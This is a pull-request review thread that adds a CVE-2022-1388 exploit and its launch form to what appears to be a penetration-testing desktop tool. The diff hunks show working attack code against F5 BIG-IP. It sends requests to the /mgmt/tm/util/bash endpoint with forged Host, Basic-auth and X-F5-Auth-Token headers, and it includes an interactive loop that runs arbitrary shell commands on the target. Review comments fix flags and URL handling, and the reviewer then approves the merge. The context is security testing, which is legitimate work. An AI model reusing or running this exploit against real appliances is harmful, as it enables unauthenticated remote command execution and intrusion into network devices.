### PR TITLE
first 1388

### PR DESCRIPTION
**Pull request by Shreeyut**
Added python file for exploit and typescript for UI
The exploit requires an X-05 authentication token to work. Currently this is only possible with third party tools.

### CODE REVIEW

**Review by BrennanHarrell — CHANGES_REQUESTED** [review]
Hi @Shreeyut,

Overall, the implementation looks good. However, there are some changes needed to ensure the tool functions as expected. I’ve also included a few suggestions to improve consistency and correctness.

File: src-tauri/exploits/CVE-2022-1388.py [hunk 1]
```diff
@@ -0,0 +1,113 @@
...
+import urllib3
+urllib3.disable_warnings()
+from urllib.error import HTTPError
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="The IP address of the target.")
+parser.add_option('-t', '--test', action="store_true", dest="test", help="Test target for CVE-2022-1388.", default=False)
+parser.add_option('-s', '--shell', action="store_true", dest="shell", help="run an interactive shell.", default=False)
+arser.add_option('-h', '--host', action="store", dest="url", help="Host IP address")
+arser.add_option('-a', '--auth', action="store", dest="url", help="X-F5-Authorization token")
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: Changed dest to host and auth

File: src-tauri/exploits/CVE-2022-1388.py [hunk 2]
```diff
@@ -0,0 +1,113 @@
...
+
+url_vuln = options.url
+host_vuln = options.host
+auth_vuln = options.auth
+cmd_1 = []
+ps1 = []
+
+if not options.url:    
+    print('[+] Please specify a target.')
+    exit()
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: added validation checks

File: src-tauri/exploits/CVE-2022-1388.py [hunk 3]
```diff
@@ -0,0 +1,113 @@
...
+
+def test_expl():
+    global HTTPError
+    command = "whoami"    
+    print("Running test on target: "+url_vuln+" | Command: whoami" )    
+    url = f'{url_vuln}/mgmt/tm/util/bash'
+    headers = {
+        'Host': url_vuln,
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: yup changed it to host_vuln

File: src-tauri/exploits/CVE-2022-1388.py [hunk 4]
```diff
@@ -0,0 +1,113 @@
...
+    ps1 = r.json()['commandResult'].strip()
+    
+def cmdExec():
+    url = f'{url_vuln}/mgmt/tm/util/bash'
+    while True:
+        cmd = input(ps1 +'$ ')           
+        headers = {
+        'Host': '127.0.0.1',
+        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
+        'X-F5-Auth-Token': 'asdf',
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: Changed headers

File: src-tauri/exploits/CVE-2022-1388.py (hunk 1 above)
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: fixed typo

File: src-tauri/exploits/CVE-2022-1388.py [hunk 5]
```diff
@@ -0,0 +1,113 @@
...
+        print("Response is empty! Target is not vulnerable..")
+        exit()    
+
+def getPS1():
+    command = "echo `whoami`@`cat /proc/sys/kernel/hostname`: $PWD"
+    url = f'{url_vuln}/mgmt/tm/util/bash'
+    headers = {
+        'Host': '127.0.0.1',
+        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
+        'X-F5-Auth-Token': 'asdf',
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: changed headers

File: src/components/CVE-2022-1388/CVE-2022-1388.tsx [hunk 6]
```diff
@@ -0,0 +1,241 @@
...
+                {loading && (
+                    <div>
+                        <Button variant="outline" color="red" style={{ zIndex: 1001 }} onClick={handleCancel}>
+                            Cancel
+                        </Button>
+                    </div>
+                )}
+                <Stack>
+                    <TextInput label={"Host IP"} required {...form.getInputProps("hostIp")} />
+                    <TextInput label={"Target IP"} required {...form.getInputProps("targetIp")} />
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src/components/CVE-2022-1388/CVE-2022-1388.tsx]: fixed typos for variables

File: src/components/CVE-2022-1388/CVE-2022-1388.tsx [hunk 7]
```diff
@@ -0,0 +1,241 @@
...
+ * @field hostPort: The port number on the host machine used for communication.
+ */
+interface FormValuesType {
+    hostIP: string;
+    targetIP: string;
+    authtoken: string;
+}
+// The title displayed in the user guide and form header
+const title = "CVE-2022-1388";
+// Descripption used to inform the user about the exploit
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src/components/CVE-2022-1388/CVE-2022-1388.tsx]: fixed typo

File: src/components/RouteWrapper.tsx [hunk 8]
```diff
@@ -141,6 +142,13 @@ export const ROUTES: RouteProperties[] = [
         description: "Apache 2.4.49 and 2.4.50 RCE",
         category: "",
     },
+    {
+        name: "CVE-2022-1388",
+        path: "/attack-vectors/cve-2022-1388",
+        element: <CVE20221388 />,
+        description: "undisclosed requests may bypass iControl REST authentication.",
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src/components/RouteWrapper.tsx]: capitalized for consistency

File: src/components/CVE-2022-1388/CVE-2022-1388.tsx [hunk 9]
```diff
@@ -0,0 +1,241 @@
...
+
+        // Define the command arguments to be executed
+        const args = [
+            "./exploits/CVE-2022-1388.py",
+            "-h",
+            values.hostIP,
+            "-u",
+            values.targetIP,
+            "a",
+            values.authtoken,
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src/components/CVE-2022-1388/CVE-2022-1388.tsx]: changed to proper token flag

**Comment by Shreeyut** [comment]
All requested changes implemented

**Review by BrennanHarrell — CHANGES_REQUESTED** [review]
Hey @Shreeyut,

I’ve made a few more minor suggestions. Additionally, I noticed that there’s currently no way to test the tool in DDT, as there isn’t a button to run it after entering all the parameters.

Could you please look into this issue?

Kind Regards,
Brennan

auth

File: src-tauri/exploits/CVE-2022-1388.py [hunk 10]
```diff
@@ -0,0 +1,117 @@
...
+        print("Response is empty! Target is not vulnerable..")
+        exit()    
+
+def getPS1():
+    command = "echo `whoami`@`cat /proc/sys/kernel/hostname`: $PWD"
+    url = f'{url_vuln}/mgmt/tm/util/bash'
+    headers = {
+        'Host': 'host_vuln',
+        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
+        'X-F5-Auth-Token': 'auth_vuln',
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: removed quotations

File: src-tauri/exploits/CVE-2022-1388.py [hunk 11]
```diff
@@ -0,0 +1,117 @@
...
+    exit()
+
+def test_expl():
+    command = "whoami"    
+    print("Running test on target: "+url_vuln+" | Command: whoami" )    
+    url = f'{url_vuln}/mgmt/tm/util/bash'
+    headers = {
+        'Host': host_vuln,
+        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
+        'X-F5-Auth-Token': options.auth,
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: changed auth variable

File: src/components/CVE-2022-1388/CVE-2022-1388.tsx [hunk 12]
```diff
@@ -0,0 +1,241 @@
...
+    hostIP: string;
+    targetIP: string;
+    authtoken: string;
+}
+// The title displayed in the user guide and form header
+const title = "CVE-2022-1388";
+// Description used to inform the user about the exploit
+const description =
+    "On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x\n" +
+    "versions undisclosed requests may bypass iControl REST authentication.\n";
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src/components/CVE-2022-1388/CVE-2022-1388.tsx]: fixed formatting

File: src-tauri/exploits/CVE-2022-1388.py [hunk 13]
```diff
@@ -0,0 +1,117 @@
...
+    ps1 = r.json()['commandResult'].strip()
+    
+def cmdExec():
+    url = f'{url_vuln}/mgmt/tm/util/bash'
+    while True:
+        cmd = input(ps1 +'$ ')           
+        headers = {
+        'Host': 'host_vuln',
+        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
+        'X-F5-Auth-Token': 'auth_vuln',
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: removed quotations

**Comment by Shreeyut** [comment]
i added the exploit button i missed. I did see a couple implementations of the poc working as intended but obtaining the authentication token for testing seemed quite challenging.

File: src/components/CVE-2022-1388/CVE-2022-1388.tsx [hunk 14]
```diff
@@ -0,0 +1,241 @@
...
+    const onSubmit = async (values: FormValuesType) => {
+        setLoading(true);
+
+        // Disallow saving until the tool's execution is complete
+        setAllowSave(false);
+
+        // Define the command arguments to be executed
+        const args = [
+            "./exploits/CVE-2022-1388.py",
+            "-h",
```
Comment (BrennanHarrell) [inline src/components/CVE-2022-1388/CVE-2022-1388.tsx:142]: Need to change the option from -h to something like -H.

```suggestion
            "-H",
```

File: src-tauri/exploits/CVE-2022-1388.py [hunk 15]
```diff
@@ -0,0 +1,117 @@
...
+parser.add_option('-h', '--host', action="store", dest="host", help="Host IP address")
+parser.add_option('-a', '--auth', action="store", dest="auth", help="X-F5-Authorization token")
+options, args = parser.parse_args()
+session = requests.Session()
+
+url_vuln = options.url
+host_vuln = options.host
+auth_vuln = options.auth
+cmd_1 = []
+ps1 = []
```
Comment (BrennanHarrell) [inline src-tauri/exploits/CVE-2022-1388.py:20]: The url_vuln variable lacks URL schemes (http:// or https://), which causes an error when trying to run it. Please update the url_vuln variable to ensure it starts with a valid protocol, such as https://

```suggestion
auth_vuln = options.auth

# Ensure the URL has a valid schema
if not url_vuln.startswith('http://') and not url_vuln.startswith('https://'):
    url_vuln = 'https://' + url_vuln  # Assuming HTTPS, change to HTTP if needed

cmd_1 = []
ps1 = []
```

**Review by BrennanHarrell — CHANGES_REQUESTED** [review]
Hey @Shreeyut,

As you noted, legitimately testing this tool in quite difficult, I would need to get a F5 BIG-IP VM to honestly do so. I’ve conducted some basic tests to identify any issues and have a few minor suggestions to improve functionality.

Additionally, similar to the issue raised in #919, I encountered a problem while testing the implementation in DDT. The tool continues to load indefinitely, and pressing the "cancel" button does not have any effect, forcing me to close the DDT tool to stop it. In contrast, the standalone script exits as expected.

Could you please investigate this issue?

Thanks.

File: src-tauri/exploits/CVE-2022-1388.py [hunk 16]
```diff
@@ -0,0 +1,122 @@
...
+session = requests.Session()
+
+url_vuln = options.url
+host_vuln = options.host
+auth_vuln = options.auth
+
+# Ensure the URL has a valid schema
+if not url_vuln.startswith('http://') and not url_vuln.startswith('https://'):
+    url_vuln = 'https://' + url_vuln # Assuming HTTPS, change to HTTP if needed
+    `
```
Comment (BrennanHarrell) [inline src-tauri/exploits/CVE-2022-1388.py:23]: Please remove the stray single quotation mark here.
```suggestion
    
```

Comment (BrennanHarrell) [inline src-tauri/exploits/CVE-2022-1388.py:23]: Please remove the stray single quotation mark here.
```suggestion
    
```

**Review by BrennanHarrell — CHANGES_REQUESTED** [review]

File: src-tauri/exploits/CVE-2022-1388.py (hunk 16 above)
Comment (BrennanHarrell) [inline src-tauri/exploits/CVE-2022-1388.py:23]: Please remove the stray single quotation mark here.
```suggestion
    
```

**Review by BrennanHarrell — CHANGES_REQUESTED** [review]
Hi @Shreeyut,

Almost there. Other than this change, just be sure to run a style check to ensure everything is formatted properly.

Thanks.

File: src-tauri/exploits/CVE-2022-1388.py [hunk 17]
```diff
@@ -0,0 +1,117 @@
...
+import optparse
+import readline
+import urllib3
+urllib3.disable_warnings()
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="The IP address of the target.")
+parser.add_option('-t', '--test', action="store_true", dest="test", help="Test target for CVE-2022-1388.", default=False)
+parser.add_option('-s', '--shell', action="store_true", dest="shell", help="run an interactive shell.", default=False)
+parser.add_option('-h', '--host', action="store", dest="host", help="Host IP address")
```
[the remark this answers is not in the document]
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: changed parameter

File: src-tauri/exploits/CVE-2022-1388.py (hunk 15 above)
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: updated url_vuln

File: src/components/CVE-2022-1388/CVE-2022-1388.tsx (hunk 14 above)
Comment (Shreeyut) [reply src/components/CVE-2022-1388/CVE-2022-1388.tsx]: changed paramter

File: src-tauri/exploits/CVE-2022-1388.py (hunk 16 above)
Comment (Shreeyut) [reply src-tauri/exploits/CVE-2022-1388.py]: Yup ive fixed the formatting and removed the quotation mark. I had internet issues and was unable to push the style fix yesterday sorry.

**Review by BrennanHarrell — APPROVED** [review]
Hey @Shreeyut,

Thanks for making those changes and adding the error handling to address the mentioned issue. Everything looks good to me; I’ve tested the app, and while it is, of course, a difficult one to properly test, I’m not encountering any unexpected errors. The functionality and output align with the expected behaviour when not used against an F5 BIG-IP, so I approve this pull request.

Kind regards,
Brennan

**Pull request merged**